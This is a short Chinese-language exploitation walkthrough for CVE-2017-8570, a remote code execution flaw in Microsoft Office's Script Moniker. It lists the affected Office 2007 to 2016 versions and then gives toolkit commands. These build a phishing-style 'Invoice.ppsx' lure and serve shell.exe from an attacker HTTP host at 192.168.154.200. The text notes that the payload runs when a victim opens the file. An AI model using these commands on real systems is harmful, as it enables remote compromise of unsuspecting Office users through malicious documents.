Script Moniker 远程代码执行漏洞
- Microsoft Office 2007 Service Pack 3
- Microsoft Office 2010 Service Pack 2 (32-bit editions)
- Microsoft Office 2010 Service Pack 2 (64-bit editions)
- Microsoft Office 2013 RT Service Pack 1
- Microsoft Office 2013 Service Pack 1 (32-bit editions)
- Microsoft Office 2013 Service Pack 1 (64-bit editions)
- Microsoft Office 2016 (32-bit edition)
- Microsoft Office 2016 (64-bit edition)
创建恶意文档
# python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.154.200/logo.doc
Generated Invoice.ppsx successfully
启动HTTP服务,监听指定端口
python cve-2017-8570_toolkit.py -M exp -e http://192.168.154.200/shell.exe -l /tmp/shell.exe
当受害者打开 Invoice.ppsx 即可执行 shell.exe,但是会有CMD窗口闪现